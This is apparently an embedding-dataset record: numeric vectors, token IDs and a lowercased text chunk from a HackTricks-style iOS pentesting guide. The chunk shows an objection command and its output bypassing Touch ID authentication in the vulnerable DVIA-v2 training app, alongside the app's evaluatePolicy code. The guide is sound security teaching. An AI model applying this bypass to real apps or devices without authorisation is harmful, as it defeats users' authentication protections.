0.5602906346321106, 0.10626208037137985, -0.9361461400985718, -0.28705182671546936, -0.0929817333817482, 0.27834486961364746, 0.06947125494480133, -0.27190306782722473, -0.4961186945438385, 0.11647561192512512, 0.704571008682251, -0.840467095375061, -0.5270676612854004, -0.6670742630958557, -0.3892965316772461, -0.14511482417583466, -0.3127061724662781, 0.31163761019706726, 0.9908274412155151, -0.1962510645389557, 0.4587908387184143, 0.43473902344703674, -0.4690442383289337, -0.1683175265789032, -0.13101689517498016, 0.23278969526290894, 0.6957230567932129, -0.5373204946517944, -0.3135089576244354, 0.4360521137714386, 0.5607832670211792, -0.5564316511154175, -0.6489405035972595, 0.05685483664274216, 0.9595959186553955, -0.11623187363147736, -0.10898654907941818, 0.1160140186548233, -0.6381596922874451, 0.6727718710899353, 0.2675795257091522, 0.08613401651382446, 0.49427494406700134, -0.3615034520626068, 0.5692644119262695, 0.273545503616333, -0.010408472269773483, -0.18693572282791138, -0.1941363364458084, 0.4227231442928314, -0.06985178589820862, 0.6043620705604553, -0.49193406105041504, -0.5150766372680664, 0.7628931403160095, 0.2783241271972656, 0.09280536323785782, -0.17561402916908264, 0.34914425015449524, 0.10422760248184204, -0.20955364406108856, 0.27350249886512756, -0.1263050138950348, 0.6929365396499634, -0.21155180037021637, 0.4251990020275116, 0.5565284490585327, -0.28518790006637573, -0.5523503422737122, -0.2071448564529419, 0.05694396421313286, 0.14075346291065216, 0.4575405418872833, -0.8542260527610779, 0.4021604657173157, 0.2809878885746002, 0.0908907800912857, 0.8014394044876099, -0.7322536110877991, 0.04837031662464142, 0.39298510551452637, 0.18896540999412537, 1.0833165645599365, 0.6468201279640198, -0.4393707811832428, -0.23796065151691437, -0.27432796359062195, -0.7945032715797424, -0.3446286618709564, -0.7210302948951721, -0.0028797537088394165, 0.5024550557136536, -0.1604221761226654, -0.744594931602478, 0.29273247718811035, -0.21767163276672363, 0.06529270857572556, -0.37822991609573364, -0.09516458213329315, -0.1638549119234085, 0.5828800797462463, -0.23914355039596558, 0.3476274311542511, -0.5156813859939575, -0.18104007840156555, 0.10316088050603867, 0.004635975230485201, 0.5207000970840454, -0.3734508156776428, 0.2625599205493927, 0.15823261439800262, 0.039475273340940475, 0.21590687334537506, 1.5205485820770264, 0.5904468297958374, 0.00821608491241932, 0.2572288513183594, 0.2530786097049713, 0.34277233481407166, -0.6257494688034058, 0.38193967938423157, 0.044875312596559525, 0.8164219260215759, 0.3491940200328827, 0.20183415710926056, -0.4166489839553833, -0.5486602187156677, -0.016436439007520676, -0.35789310932159424, -0.031025147065520287, 0.2992000877857208, -0.46084409952163696, 0.6667816042900085, 0.7269776463508606, 0.2051296979188919, -1.3086427450180054, -0.33762043714523315, 0.056382037699222565, -2.0130460262298584, -0.448430597782135, 0.9225807189941406, 0.005092000588774681, 0.47129693627357483, -0.43874862790107727, -0.14593388140201569, 0.7437056303024292, 0.48470360040664673, -0.48046645522117615, 0.6742337942123413, 0.4154953062534332, -0.09988000988960266, -0.708582878112793, -0.21919159591197968, 0.22337977588176727, 0.08883685618638992, -0.0037644761614501476, 0.836991548538208, 0.06231250613927841, 0.3511528968811035, -0.016885239630937576, 0.5297135710716248, 0.45647555589675903, 0.28060290217399597, -0.5054184794425964, -0.5728490352630615, 0.04242095723748207, 0.6123537421226501, -0.22216874361038208, -0.17301946878433228, 0.20730112493038177, 0.5046724677085876, 0.22779498994350433, 1.3885066509246826, 0.1621536910533905, -0.22026769816875458, 0.9163604974746704, -0.05147160217165947, 0.18694745004177094, 0.29460376501083374, -0.4522050619125366, 0.7029960751533508, 0.7403057217597961, 0.7980226278305054, 0.3278016746044159, 0.39888209104537964, 0.2099824845790863, -0.516499936580658, 0.12851965427398682, -0.12318611145019531, 0.25902414321899414, 0.8090342879295349, 0.47635897994041443, -0.010300044901669025, -0.7762943506240845, -0.1416880041360855, 0.6960498690605164, 1.0531954765319824, -0.8612611889839172, -0.8432067632675171, 0.165208101272583, -0.15202739834785461, -0.4646349847316742, -0.733677327632904, 0.1680315136909485, 0.14039579033851624, 0.4505510628223419, 0.08431605249643326, -0.7641251683235168, -0.6263442635536194, -1.0740705728530884, -0.7592781782150269, -1.0468597412109375, -0.2398400753736496, -0.4556220471858978, -0.24314190447330475, 0.12621629238128662, -0.2951299548149109, 0.6460521221160889, -0.5239408016204834, -0.47805774211883545, -0.08688448369503021, -0.27072906494140625, 1.198044776916504, 0.15805062651634216, 0.3428505063056946, -0.757664144039154, 0.4943331182003021, 0.6468247175216675, 0.8600534796714783, -0.09518782794475555, -0.3790440261363983, -0.17271746695041656, -0.4600241184234619, 0.16530592739582062, -0.5950965285301208, 0.903969943523407, -0.15478754043579102, -0.6383067965507507, 0.028447814285755157, 0.5060936808586121, 0.03531671687960625, 0.37763410806655884, 0.4073426425457001, -0.7201098203659058, 0.558651328086853, 0.08136038482189178, -0.4156566858291626, 0.13103635609149933, 0.5980217456817627, -0.2861531376838684, 0.5532597303390503, -0.139362633228302, 0.7444478273391724, -0.37312495708465576, 0.48207855224609375, 0.6617622971534729, 0.06453540176153183, -0.30461740493774414, -0.41746172308921814, -0.1467709243297577, -0.3106265962123871, -0.29337334632873535, -0.5419996976852417, -0.2762644588947296, 0.08521443605422974, -0.07302913814783096, -1.2001937627792358, 0.47006872296333313, -0.7107504606246948, -0.2621338367462158, -0.6249039173126221, -0.567470133304596, 0.8690476417541504, 0.22196798026561737, 0.12774008512496948, 0.009960228577256203, -0.8971938490867615, 0.11927172541618347, 0.4228878915309906, 0.3326248824596405, -0.5830116271972656, 0.49444910883903503, 0.027119740843772888, -0.2773401439189911, 0.8160445094108582, 0.025044497102499008, -0.5606392025947571, -0.3541094958782196, -0.32910552620887756, -0.16226691007614136, 0.1914384961128235, 0.2975758910179138, 0.5324984788894653, 0.04222243279218674, 0.6674087643623352, -0.48515641689300537, -0.05035834759473801, 0.0021311575546860695, -0.2303657978773117, 0.16390500962734222, -0.08006028085947037, -0.15866447985172272, 0.4634215831756592, -0.3168490529060364, -0.5639540553092957, -0.40632757544517517, 0.1880333423614502, 0.6339306235313416, -0.15711627900600433, 0.8107795715332031, -0.6595320701599121, -0.1285012662410736, 0.5809163451194763, -0.1877351999282837, -0.6134827136993408, 0.8731492161750793, -0.2711649537086487, 0.5967224836349487, -0.33143413066864014, -0.09617778658866882, 0.34099286794662476, 0.02652067504823208, 0.47782307863235474, 0.22599776089191437, -0.1241857260465622, -0.5260651111602783, -0.7924798727035522, -0.20477688312530518, -0.31145912408828735, 0.5254212617874146, 0.320037305355072, -0.20738495886325836, -0.8452650308609009, -0.8325935006141663, -0.7726695537567139, -0.0967714935541153, 0.6532021164894104, 0.8735376596450806, 0.4375339448451996, 0.2811376750469208, 0.4620274603366852, 0.31123030185699463, 0.8766152858734131, -0.7924648523330688, 0.3561321794986725, -0.3913457691669464, 0.9497506618499756, -0.8615225553512573, -0.06168653443455696, -0.8079378008842468, 0.10174639523029327, -0.08830742537975311, -0.08342903852462769, -0.02279401384294033, -0.06886904686689377, -0.4872346818447113, -0.4047875702381134, 0.44880548119544983, 0.1917424499988556, -0.49575507640838623, -0.23769567906856537, -0.07804525643587112, 0.39084622263908386, 0.37114569544792175, -0.33026406168937683, -0.061557140201330185, -0.7416298985481262, 0.16797082126140594, 0.11618757992982864, -0.020862961187958717, -0.12124892324209213, -0.07691223174333572, -0.491615355014801, -0.20980602502822876, 0.281133770942688, 0.30456289649009705, 0.42183226346969604, -0.02716912515461445, -0.9957255721092224, 0.2832412123680115, 0.5123783349990845, -0.5880876779556274, -0.3859216570854187, -0.25173839926719666, 0.3027784526348114, 0.4088478684425354, 0.16986241936683655, -0.6585535407066345, -0.317225843667984, 0.330091267824173, -0.4607560932636261, 0.20378915965557098, -0.928959846496582, -0.408783495426178, -0.04491354525089264, 0.37928780913352966, -0.059557460248470306, 0.54850834608078, -0.563875138759613, 0.10828566551208496, -0.1697102040052414, 0.23536621034145355, -0.08712882548570633, -0.021068280562758446, 0.8995054960250854, -0.22100038826465607, -0.4036460518836975, 0.4986598491668701, 0.5651983618736267, 0.11244550347328186, 0.39354974031448364, -0.5595778822898865, -0.3605709373950958, 0.6701474189758301, -0.2172386348247528, 0.853611409664154, 0.46911898255348206, 0.5460368394851685, 0.11063140630722046, -0.590929388999939, 0.39307424426078796, -0.20694217085838318, 0.32166868448257446, -1.08055579662323, -0.6839078664779663, -0.09012442082166672, -0.16464708745479584, 0.25865188241004944, 0.7583932876586914, 0.6145987510681152, -0.2225322127342224, -0.14387784898281097, 0.16134557127952576, -0.70722895860672, -0.6087989807128906, -0.41344642639160156, -0.452178418636322, 0.27744588255882263, -0.1075672134757042, 0.5669291615486145, 0.06775180995464325, -0.5513548851013184, 0.4467599391937256, -0.1624329686164856, 0.37637099623680115, -0.8694694638252258, -0.16794294118881226, -0.6223981380462646, 0.20618456602096558, -0.5742636322975159, 0.6237702965736389, 0.03391777724027634, -0.13369913399219513, -0.19579707086086273, 0.2343979924917221, 0.20175671577453613, 0.12502296268939972, -0.19312548637390137, 0.39609888195991516, 0.23094935715198517, -0.2979814410209656, -0.05824851617217064, 0.39190763235092163, -0.1566934734582901, 0.4203782379627228, 0.12569506466388702, -0.1677311658859253, -1.2069169282913208, -0.6010558009147644, 0.13237252831459045, 0.052255257964134216, 0.2731979787349701, -0.4560714066028595, -0.16258560121059418, -0.22533969581127167, 0.328339159488678, 0.12874826788902283, -0.4745641052722931, -0.3306632339954376, -0.4664047658443451, 0.15276330709457397, -0.061596762388944626, -0.14424686133861542, -0.3773340582847595, -0.6275756359100342, -0.23904936015605927, 0.5618675947189331, 0.03679540753364563, 0.3170836269855499, -0.23132140934467316, -0.16684913635253906, 0.13839717209339142, -0.09762652963399887, -0.602935254573822, -1.2514101266860962, 0.16373863816261292, -0.0856097862124443, -0.2740905284881592, 0.6891456246376038, -0.6580155491828918, 0.2317276895046234, -0.14997079968452454, 0.3278771936893463, 0.5627958178520203, -0.46402493119239807, -0.10901492089033127, -0.04501144960522652, 0.709234356880188, -1.0506038665771484, 0.13175249099731445, -0.048818688839673996, 0.5865188241004944, 0.24432745575904846, -0.1938164383172989, -0.4880911707878113, 0.16819463670253754, -0.7873929142951965, -1.199977159500122, 0.21829591691493988, 0.4406508803367615, 0.12406446039676666, -0.2193327248096466, -0.30177509784698486, 0.3257187008857727, 0.05039174482226372, 0.25821980834007263, 0.9420791268348694, 0.3909376859664917, 0.10865608602762222, -0.5700950026512146, 0.8330944776535034, 0.28734123706817627, 0.05784822255373001, 0.07213357090950012, -0.24923554062843323, -0.009976559318602085, -0.04721030965447426, -0.4482429325580597, 0.01515957061201334, -0.2653084695339203, -0.46093615889549255, 0.2364327311515808, 0.08777531236410141, 0.5476034879684448, -0.3946343660354614, -0.8427318930625916, -0.24528513848781586, 0.5308526754379272, -0.2465066760778427, -0.1436898410320282, 0.5155132412910461, 0.5368187427520752, -0.29799893498420715, -0.12824903428554535, 0.46851617097854614, -0.21570171415805817, -0.34878572821617126, 0.4790291488170624, -0.2028457671403885, -0.21308109164237976, 1.0849881172180176, 0.6625908613204956, -0.803693413734436, -0.5778082609176636, 0.17679055035114288, -0.5844970941543579, -0.36954841017723083, -0.2558676600456238, -0.5091406106948853, -0.17911270260810852, 0.2031293511390686, -0.28172147274017334, 0.3059077560901642, -0.12638114392757416, 0.2415655553340912, -0.617854118347168, 0.600340723991394, 0.08877509832382202, 0.24236541986465454, 0.9475764036178589, -1.1355491876602173, -0.1882609724998474, -0.7278271913528442, 0.2530885338783264, 0.08804024010896683, -0.012792818248271942, 0.9181241989135742, -0.2389192432165146, 0.41187816858291626, 0.029760099947452545, -0.34238913655281067, 0.8926185369491577, -0.4354972243309021, 0.5055316686630249, 1.1341036558151245, 0.050729021430015564, -0.6940141320228577, -0.65325528383255, 0.35864099860191345, 0.0490122027695179, 0.3039860427379608, -0.2816455066204071, -0.2317398488521576, -0.07960431277751923, 0.3357899487018585, -0.2099420726299286, -0.3558911979198456, -0.749279797077179, -0.6635271906852722, -0.11674104630947113, -0.2792193591594696, 0.1757657676935196, -0.2008979618549347, 0.3380056321620941, -0.34266290068626404, -0.013211347162723541, -0.5959873199462891, 0.15228456258773804, -0.5116991400718689, 0.20823070406913757, -0.226624995470047, 0.3269113004207611, -0.6846522688865662, -0.6505780816078186, -0.7528436183929443, -0.4514027237892151, -0.3788493573665619, -1.1866590976715088, -0.22314925491809845, 0.04964185506105423, -0.6063632369041443, 0.2989402711391449, -0.8836275935173035, -0.23046256601810455, 0.014665295369923115, -0.6834553480148315, 0.3569261133670807, 0.926111102104187, -0.3150976598262787, 0.2500373423099518, -0.017396241426467896, 0.5538051128387451, 0.14575454592704773, -0.44982579350471497, -0.0742659717798233, -0.19179444015026093, 0.0732107013463974, 0.31531161069869995, 0.7286707758903503, -0.34420645236968994, -0.09264719486236572, -0.2478984296321869, -0.679984450340271, -0.3764532804489136, -0.39677315950393677, -0.05069225654006004, 0.43160295486450195, -0.18929146230220795, 0.5060774683952332, 0.3272858262062073, 0.5270282626152039, 0.4702494740486145, -0.7833014726638794, 0.6274836659431458, 0.5389921069145203, -0.07976634055376053, 0.15269477665424347, 0.34011325240135193, 0.5447340607643127, -0.4592284858226776, 0.5306245684623718, 0.09360289573669434, -0.3343895971775055, 0.3001939654350281, -0.399120032787323, -0.36875197291374207, -0.5124521255493164, 0.11939513683319092, 0.1273140162229538, 0.25564464926719666, 0.15227504074573517, -0.1746138632297516, 0.5821653008460999, -0.22913332283496857, -0.6799761056900024, 0.123952217400074, -1.1623432636260986, -0.06333942711353302, 0.07633315771818161, -0.06508700549602509, -0.17119935154914856, -0.6985534429550171, -0.36338090896606445, 0.025389254093170166, 0.12645111978054047, -0.22935402393341064, 0.11849799007177353, -0.09023075550794601, 0.028676355257630348, 1.0857371091842651, -0.5735592246055603, -0.196560338139534, -0.5121179223060608, 0.23222538828849792, -0.8855342268943787, -1.1853046417236328, 0.35838913917541504, 0.881973147392273, 0.5235390067100525, 0.058537449687719345, -0.7818433046340942, -0.09536018967628479, 0.5585929155349731, -0.2045755833387375, 0.1262509673833847, 0.1382470577955246, -1.1861547231674194, 0.6332356929779053, -0.3716849088668823, 0.15578852593898773, 0.26275432109832764, -0.11150389909744263, 0.14098095893859863, -0.4376816749572754, -0.7018232941627502, -0.023048751056194305, 0.14076754450798035, -0.28296998143196106, 1.2215549945831299, 0.2759733498096466, 0.518051266670227, -0.4307733178138733, 0.07649430632591248, -0.7010261416435242, 0.43366044759750366, 0.4179786145687103, 0.20364472270011902, -0.1102885827422142, 0.4278159737586975, 0.5445247888565063, -0.09210653603076935, 0.31193163990974426, 0.47063180804252625, 0.4675024747848511, -0.14286375045776367, 0.24643942713737488, -0.25642073154449463, 0.383673757314682, -0.0498521514236927, -0.3988816440105438, -0.10095970332622528, 0.20545901358127594, 0.10186149179935455, 0.3496204614639282, -0.3954884707927704, 0.19412057101726532, -0.9338345527648926, 0.42831721901893616, -0.4917804002761841, 0.13813234865665436, 0.12058988958597183, 0.012852106243371964, -0.39793869853019714, 0.4566108286380768, 0.8306566476821899, 0.41614043712615967, 0.412178099155426, 0.5230113863945007, -0.4371035695075989, 0.061612606048583984, 0.26259565353393555, 0.007425941992551088, -0.33793583512306213, 0.1612415909767151, 0.3708876967430115, -0.1915746033191681, -0.5066967606544495, 0.5169717669487, 0.10232576727867126, 0.10013848543167114, 0.6170275211334229, -0.23963090777397156, -0.028106611222028732, -0.09694413840770721, 0.500277042388916, -0.2536701261997223, -0.5223617553710938, 0.4695852994918823, -0.5361859798431396, -0.7076283097267151, 1.0150984525680542, 0.5718286037445068, 0.6911250352859497, 0.3019423186779022, 0.7038997411727905, -0.025753505527973175, 0.7723844647407532, -0.05396826192736626, -0.10074934363365173, -0.48342201113700867, -0.02421063371002674, -0.192086324095726, -0.7846370339393616, 0.2906133532524109, -0.2209913730621338, 0.5007179975509644, -0.21844767034053802, -0.4753631353378296, -0.9151197671890259, -0.1522202044725418, -0.6027927398681641, -0.6636955738067627, 0.6136648654937744, -0.37992462515830994, -0.4876812696456909, 0.4410601258277893, 0.4546465575695038, 0.5324417352676392, 0.7089500427246094, 0.06887786835432053, -0.4581245183944702, -0.14729219675064087, -0.30645856261253357, -0.11631566286087036, 0.7232353687286377, 0.14536933600902557, -0.2586699426174164, 0.20880480110645294, -1.1841565370559692, -0.24573878943920135, -0.05668576806783676, -0.18023847043514252, -0.5451316833496094, 0.1411212682723999, 0.42085179686546326, 0.5991259217262268, 0.169134721159935, -0.304736465215683, 0.12045019865036011, 0.312572181224823, 0.4592079818248749, -0.7295015454292297, 0.8834648728370667, 0.5357376337051392, -0.12570790946483612, 0.212950199842453, -0.1585746705532074, 0.5355571508407593, -0.23890040814876556, -0.1982889175415039, -0.21607926487922668, -0.09633678942918777, -0.6944007277488708, -0.06084589287638664, -0.043997034430503845, 0.04917917400598526, 0.2503327429294586, -0.06778211146593094, -0.6389392018318176, 0.21848031878471375, -0.35129398107528687, 0.23667682707309723, -0.00035513530019670725, 0.09961389005184174, 0.3730715215206146, -0.1432615965604782, 0.5324053168296814, -1.3332387208938599, 4.544791221618652, 0.5583073496818542, 0.15057708323001862, -0.03553126007318497, 0.5215872526168823, 0.5182839035987854, 1.210881233215332, -0.38906002044677734, 0.1910862773656845, -0.16430795192718506, -0.0694679468870163, -0.2550317645072937, 0.2937931418418884, 0.18050074577331543, 0.026967374607920647, 0.48471134901046753, -0.5037016868591309, -0.3447529375553131, 0.2158210724592209, -0.914968729019165, -0.6391652822494507, 0.014423247426748276, -0.4189908802509308, 0.9831897020339966, 0.6158010363578796, 0.3626716136932373, 0.12272460013628006, -0.5668379068374634, -0.3160455524921417, -0.18960830569267273, 0.5406869649887085, -0.2072603404521942, 0.5047973394393921, -0.6066462397575378, -0.41745635867118835, -0.5014393329620361, 0.23873451352119446, -1.0598201751708984, -0.5140411853790283, 0.6142610311508179, 0.26260337233543396, 0.20047010481357574, 0.20785358548164368, -0.21320490539073944, 0.22890348732471466, 0.4290991723537445, -0.6688964366912842, 0.30486971139907837, 0.4561815559864044, -0.8403664231300354, 0.5001549124717712, 0.2697031497955322, 0.9006189703941345, 0.1582264006137848, -0.20095060765743256, -0.002643597312271595, 0.25652748346328735, -0.2937507927417755, 0.12402685731649399, -0.1927957981824875, 0.30551016330718994, -0.6028326153755188, 0.11791953444480896, -0.05287332832813263, -0.5978960394859314, 0.7435731887817383, 0.1990976631641388, -0.27739810943603516, -0.38347846269607544, -0.5434432029724121, -0.045951440930366516, -0.14756500720977783, -0.27800193428993225, -0.15731190145015717, 0.964541494846344, -0.25596120953559875, -0.32059717178344727, 0.4567667543888092, 0.24490347504615784, -0.30646756291389465, -0.30029037594795227, -0.7904663681983948, -0.8037600517272949, 0.2128554880619049, 0.7647448778152466, 0.6217951774597168, -0.07443591207265854, -0.7389262914657593, -0.01374809443950653, 0.2178373634815216, 0.3313179314136505, -0.011846208944916725, -0.06006563827395439, -0.04662853106856346, 0.26660647988319397 ]
[ 20786, 1027, 5164, 1006, 2951, 1024, 23032, 6072, 11314, 2004, 999, 2951, 1010, 17181, 1024, 1012, 21183, 2546, 2620, 1007, 999, 1013, 1013, 5147, 2363, 20786, 1065, 2842, 1063, 1013, 1013, 20104, 2025, 2979, 1065, 1013, 1013, 1015, 1012, 9375, 23032, 3619, 29201, 3258, 5649, 1008, 23032, 1027, 1030, 1063, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 8586, 26266, 1024, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 8586, 26266, 6914, 22420, 15194, 18351, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 8586, 13465, 14287, 2850, 2696, 1024, 1030, 2748, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 19281, 4779, 22648, 3597, 16671, 1024, 1030, 1000, 2026, 2171, 2487, 1000, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 19281, 4779, 12190, 16336, 2140, 1024, 1030, 1000, 4012, 1012, 2033, 1012, 2026, 29098, 1012, 20786, 1000, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 8586, 8557, 25918, 3370, 21572, 27718, 1024, 1030, 1000, 3531, 1010, 3413, 3166, 6648, 2000, 4607, 2023, 2181, 1000, 1065, 1025, 1013, 1013, 1016, 1012, 2131, 8875, 2278, 6199, 18863, 2890, 2546, 23032, 6072, 11314, 1027, 19701, 1025, 9808, 9153, 5809, 3570, 1027, 10819, 4221, 12458, 7361, 24335, 4017, 8450, 1006, 1006, 1035, 1035, 2958, 12935, 29201, 3258, 5649, 2890, 2546, 1007, 23032, 1010, 1004, 23032, 6072, 11314, 1007, 1025, 2065, 1006, 3570, 1027, 1027, 2053, 2121, 2099, 1007, 1063, 24978, 2850, 2696, 1008, 2765, 2850, 2696, 1027, 1006, 1035, 1035, 2958, 1035, 4651, 24978, 2850, 2696, 1008, 1007, 23032, 6072, 11314, 1025, 24978, 3367, 4892, 1008, 20786, 1027, 1031, 1031, 24978, 3367, 4892, 2035, 10085, 1033, 1999, 4183, 24415, 2850, 2696, 1024, 2765, 2850, 2696, 17181, 1024, 24978, 4904, 2546, 2620, 3367, 4892, 2368, 3597, 4667, 1033, 1025, 24978, 21197, 1006, 1030, 1000, 1003, 1030, 1000, 1010, 20786, 1007, 1025, 1065, 2842, 1063, 24978, 21197, 1006, 1030, 1000, 2242, 2253, 3308, 1000, 1007, 1025, 1065, 10788, 10383, 3351, 1997, 7705, 2015, 1999, 2019, 10439, 2064, 2036, 2022, 11156, 2011, 20253, 1996, 10439, 12441, 1005, 1055, 2862, 1997, 4207, 8790, 8860, 1012, 2023, 2064, 2022, 2589, 2011, 2478, 27178, 13669, 1024, 1002, 27178, 13669, 1011, 1048, 1026, 10439, 18442, 1028, 1012, 10439, 1013, 1026, 10439, 18442, 1028, 2065, 2334, 4887, 10760, 16778, 10719, 1012, 7705, 2003, 2109, 1999, 2019, 10439, 1010, 1996, 6434, 2097, 5383, 2119, 1997, 1996, 2206, 3210, 1006, 3342, 2008, 2334, 4887, 10760, 16778, 10719, 1012, 7705, 3594, 3036, 1012, 7705, 2104, 1996, 7415, 1007, 1024, 1013, 2291, 1013, 3075, 1013, 7705, 2015, 1013, 2334, 4887, 10760, 16778, 10719, 1012, 7705, 1013, 2334, 4887, 10760, 16778, 10719, 1013, 2291, 1013, 3075, 1013, 7705, 2015, 1013, 3036, 1012, 7705, 1013, 3036, 10128, 3036, 1012, 7705, 2003, 2109, 1010, 2069, 1996, 2117, 2028, 2097, 2022, 3491, 1012, 2334, 27280, 7705, 11826, 16429, 20614, 3258, 16429, 20614, 3258, 16012, 12589, 2015, 11826, 2064, 2022, 2109, 2000, 11826, 2334, 4887, 10760, 16778, 10719, 1012, 22224, 3594, 10424, 8524, 2000, 6602, 1996, 16157, 18155, 2594, 2100, 3853, 2061, 2008, 2009, 5651, 2995, 2130, 2065, 27280, 2001, 2025, 5147, 2864, 1012, 2224, 1996, 16380, 21318, 16012, 12589, 2015, 1035, 11826, 3094, 2000, 11826 ]
hack_tricks
43.txt
23
the insecure biometric authentication. objection will register a job, which will replace the evaluatepolicy result. it will work in both, swift and objective - c implementations.... itudehacks. dviaswiftv2. develop on ( iphone : 13. 2. 3 ) [ usb ] # ios ui biometrics _ bypass ( agent ) registering job 3mhtws9x47q. type : ios - biometrics - disable... itudehacks. dviaswiftv2. develop on ( iphone : 13. 2. 3 ) [ usb ] # ( agent ) [ 3mhtws9x47q ] localized reason for auth requirement : please authenticate yourself ( agent ) [ 3mhtws9x47q ] os authentication response : false ( agent ) [ 3mhtws9x47q ] marking os response as true instead ( agent ) [ 3mhtws9x47q ] biometrics bypass hook completeif vulnerable, the module will automatically bypass the login form. fridaan example of a use of evaluatepolicy from dvia - v2 application : + ( void ) authenticatewithtouchid { lacontext * mycontext = [ [ lacontext alloc ] init ] ; nserror * autherror = nil ; nsstring * mylocalizedreasonstring = @ " please authenticate yourself " ; if ( [ mycontext canevaluatepolicy : lapolicydeviceownerauthenticationwithbiometrics error : & autherror ] ) { [ mycontext evaluatepolicy : lapolicydeviceownerauthenticationwithbiometrics localizedreason : mylocalizedreasonstring reply : ^ ( bool success, nserror * error ) { if ( success ) { dispatch _ async ( dispatch _ get _ main _ queue ( ), ^ { [ touchidauthentication showalert : @ " authentication successful " withtitle : @ " success " ] ; } ) ; } else { dispatch _ async ( dispatch _ get _ main _ queue ( ), ^ { [ touchidauthentication showalert : @ " authentication failed! " withtitle : @ " error " ] ; } ) ; } } ] ; } else { dispatch _ async ( dispatch _ get _ main _ queue ( )
[ -0.01220773346722126, -0.7920267581939697, -1.0082275867462158, 0.4960818588733673, -0.5870087146759033, -0.31399017572402954, 0.09272412955760956, 0.0782356858253479, 0.11683879047632217, 0.8284266591072083, 0.34222978353500366, -0.17512734234333038, 0.29374513030052185, -0.04049793258309364, -0.4073348939418793, -0.19949603080749512, -0.3895857036113739, 0.012793846428394318, -0.41341128945350647, -0.05760350078344345, 0.5839219093322754, 0.3015041649341583, -0.5519322752952576, -0.41103672981262207, -0.597090482711792, 0.43089908361434937, 0.265484094619751, 0.02610672265291214, 0.7973728179931641, 0.23833563923835754, -0.06625557690858841, -0.42657068371772766, 0.025669950991868973, -0.38311704993247986, 0.4593557119369507, -0.19865310192108154, 1.0732663869857788, -0.13918641209602356, -0.022154785692691803, -0.6988484263420105, 0.5483056306838989, 0.34502142667770386, -0.3934156894683838, -0.0733606368303299, -0.6807683110237122, -1.1739816665649414, -0.3622552454471588, -0.17971594631671906, 0.1451292634010315, -0.1506473869085312, -0.046318065375089645, 0.27512747049331665, 0.2538016438484192, -0.2226891815662384, -0.21174561977386475, -0.16103744506835938, -0.15313075482845306, 0.05688530579209328, -0.1506735235452652, 0.7737922668457031, 0.039841681718826294, -0.057435475289821625, 0.2507393956184387, -0.9074994325637817, 0.283401221036911, -0.041408833116292953, -0.2899620831012726, -0.1671012043952942, -0.3234005272388458, -0.5310631394386292, -0.15642471611499786, 0.33126890659332275, -0.7897769808769226, -0.4022659659385681, -0.5255882143974304, -0.33273935317993164, -0.24636144936084747, -0.9286209344863892, -0.04591410979628563, 0.3925713300704956, 0.1632997989654541, 0.4034292697906494, 0.23716649413108826, -0.17327240109443665, 0.36334580183029175, 0.2531270980834961, 0.936981201171875, 1.2902960777282715, -0.040644899010658264, 0.21441277861595154, 0.5231794118881226, 0.4759248197078705, -0.552700400352478, -0.7634072303771973, 0.18144510686397552, 0.5983691215515137, -0.4934823513031006, -0.20520421862602234, 0.28508663177490234, -0.29650330543518066, 0.6099944710731506, 0.3768460154533386, 0.06838543713092804, 0.6724544763565063, -0.018077583983540535, 0.5997029542922974, 0.3756084740161896, 0.16564200818538666, 0.2302243560552597, -0.9212441444396973, 0.6726943850517273, 0.026645716279745102, -0.05493926629424095, -0.7893466353416443, 0.4112444221973419, 1.1216530799865723, 0.029799602925777435, 0.060501646250486374, -0.5056781768798828, -0.05542592331767082, -0.12799789011478424, -0.2071068435907364, 0.4678606688976288, 0.4227835536003113, 0.5181222558021545, -0.5188570618629456, 1.035520076751709, 0.7561126947402954, -0.7485843300819397, -0.026141412556171417, -0.21100004017353058, -0.017203202471137047, 0.3404575288295746, -0.049845896661281586, -0.2152179777622223, 0.25753527879714966, 0.3000399172306061, 0.6866454482078552, 0.4209100008010864, -0.41221123933792114, 0.047953780740499496, 0.6458381414413452, 0.09200645983219147, 1.1839243173599243, 0.2233952134847641, 0.04578106850385666, -0.24770934879779816, -0.34373682737350464, -0.22368775308132172, 0.1311553418636322, 0.08061321079730988, 0.08221018314361572, 0.5786650776863098, 0.14161336421966553, -0.7600088715553284, -0.46375319361686707, -0.2866687774658203, 0.2588290274143219, 0.4003783166408539, -0.14718316495418549, -0.5005613565444946, 1.2439969778060913, -0.15152060985565186, 0.25350603461265564, -0.056678179651498795, 0.30754896998405457, -0.4526101350784302, -0.17065395414829254, 0.023747075349092484, -0.2926346957683563, 0.3766878843307495, 0.12579579651355743, 0.008503400720655918, -0.08877608925104141, 0.8131747245788574, 0.7026545405387878, 0.8048815131187439, -0.2746589183807373, 1.0287370681762695, 0.3506009876728058, -0.7283294200897217, -0.10698311775922775, -0.42742401361465454, 1.3224343061447144, 0.21281777322292328, 0.4051550030708313, 0.06539151072502136, -1.2305057048797607, 0.043457791209220886, -0.9943386912345886, -0.41757693886756897, 0.364219069480896, -0.31478574872016907, 0.8504008054733276, 1.1354464292526245, 0.012436232529580593, -0.5722760558128357, -0.48733434081077576, 0.42355844378471375, -1.04487144947052, -0.45556187629699707, 0.749086856842041, 0.17005835473537445, 1.1119736433029175, -0.5739168524742126, -0.18634101748466492, 0.5674664974212646, 0.24881628155708313, -0.8231796026229858, 0.8397170305252075, 0.5957268476486206, 0.19074289500713348, -0.09043148159980774, -0.7450549006462097, 0.15403620898723602, -0.08464370667934418, -0.2635127007961273, 0.47232577204704285, 0.39964762330055237, 0.2273537516593933, -0.01984875276684761, -0.21438148617744446, 0.6223703026771545, 0.4370088279247284, 0.00746029382571578, -0.37349456548690796, 0.3288043439388275, 0.6560238599777222, -0.3273269832134247, -0.19224156439304352, 0.5487220883369446, 0.8829327821731567, 1.0136042833328247, 0.9658747911453247, 0.4349866211414337, -0.05613364651799202, 0.19591952860355377, 0.0633917972445488, 0.4582642614841461, -0.142167329788208, -0.3498782515525818, 1.0327963829040527, 1.1528165340423584, 0.7854049205780029, -0.253231406211853, 0.009325665421783924, -0.464397668838501, -0.14255249500274658, 0.4883878529071808, 0.5227445363998413, 0.29699066281318665, 0.8139007091522217, 0.761593222618103, 0.021484749391674995, -1.0273919105529785, -0.5621461272239685, 1.085302710533142, 0.3407714366912842, -0.6352118253707886, -0.4239234924316406, -0.21138685941696167, 